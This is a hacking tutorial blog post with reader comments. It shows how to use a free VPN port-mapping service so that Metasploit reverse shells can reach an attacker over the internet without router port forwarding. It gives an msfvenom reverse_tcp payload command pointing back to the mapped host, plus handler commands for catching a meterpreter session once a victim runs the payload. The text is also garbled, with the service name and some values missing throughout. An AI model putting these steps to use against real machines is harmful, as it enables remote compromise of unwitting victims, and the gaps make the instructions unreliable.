How to Hack on WAN Without Port Forwarding using

Hacking on WAN using

Since most of the ISP doesn’t provide port forwarding, hacking on WAN has always been a difficult task few years back. Later, SSH tunneling and Premium VPNs came as an alternative for Port Forwarding and it let hackers to hack over WAN.

Ngrok servers as a leading SSH tunneling provider, but the problem with them is they lack persistence. Each time when you reconnect, you’ll be provided with a random subdomain.

To over come this, came with “Unique Subdomain” feature which allowed it’s users to choose their own subdomain. Though, doesn’t reach much as ngrok did.

The problem with paid VPN is their cost. Although they provide port forwarding facility, the cost more. Now, com offers free port mapping configurations that can be used with Open VPN for port forwarding and performing Penetration test over WAN.

Things you’ll need before proceeding :

  • Open VPN
  • Account

Hack on WAN Without Port Forwarding using :

  • Install Open VPN in kali Linux. To install and configure OpenVPN in Kali Linux, click here.
  • Now, login to your account.
Create New Configuration
Create New Configuration
  • After logging in, Click on “Create New Configuration” Configuration Configuration
  • Choose a name for your configuration. (In your free plan, you can configure only one mapping, so choose it wise. You’ve to pay and subscribe for more)
  • Default type is “Open VPN”
  • Change the protocol to “TCP” if it’s in UDP by default.
  • Comment if you wish, else leave the box empty.
  • Now, click on “Generate” to generate the configuration file
  • After generation, Download the configuration file.
  • After downloading, click “Create” to create the file. (You can download before creation)
Configuration Successfull
Configuration Successful
  • Now that we have successfully created our configuration file, Navigate to “Mapping Rules” and click “Create a New Rule”
  • Now, configure the Rule as given in the image below
Port forwarding in
Port forwarding in
  • All the values will be filled by default, all you have to do is choose the port to forward.
  • In my case, I’ve selected to forward port 4444. You can choose your own.
  • After entering the port of your choice, Click on “create” to create the mapping rule.
Successful Mapping Rule in
Successful Mapping Rule in
  • In payload creation, “” will serve as Lhost and 53723 will serve as Lport.
  • Now, to connect to the vpn, type “openvpn <name of config file you have downloaded>
  • Ex : openvpn thoatta.port4444.ovpn
  • Now, the vpn connection will be initiated and you’ll be connected to the vpn.
openvpn connection success
openvpn connection success
  • After successful VPN connection, leave the terminal running in the background.
  • If you close, the connection will be terminated.
  • Now, you’ll be assigned with a new IP address under the Tun0 interface.
tun0 ifconfig
tun0 ifconfig
  • The IP address in the tun0 will be used to  create the listener whereas the host name in the mapping rule will be used to create the payload.
  • Now in order to create a payload with msfvenom,
    • msfvenom -p <payload/reverse_tcp> LPORT=53723 R > /root/Desktop/payload_name
  • After successful payload creation, in order to create listener in Metasploit, type
    • use exploit/multi/handler
    • set payload <payload/reverse_tcp>
    • set lhost <IP of tun0 interface>
    • Ex : set lhost
    • set lport <port you’ve selected in mapping rule>
    • Ex : set lport 4444 (In my case, I’ve selected port 4444 to forward in mapping rule)
    • exploit
  • Now, the exploit will be successfully launched and you’ll get meterpreter once the payload which you have created has been executed by the victim.

If you have any comments, please leave them in the comment box below and share the article if you like 🙂


  1. dear sir whenever i tried canyouseeme /portchecker it shows connection timed out and port is closed? plz help me to solve this >thanks

    • Depends on what configuration you are using in Open VPN. The configuration file decides the connection to the host you’re choosing,.


Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.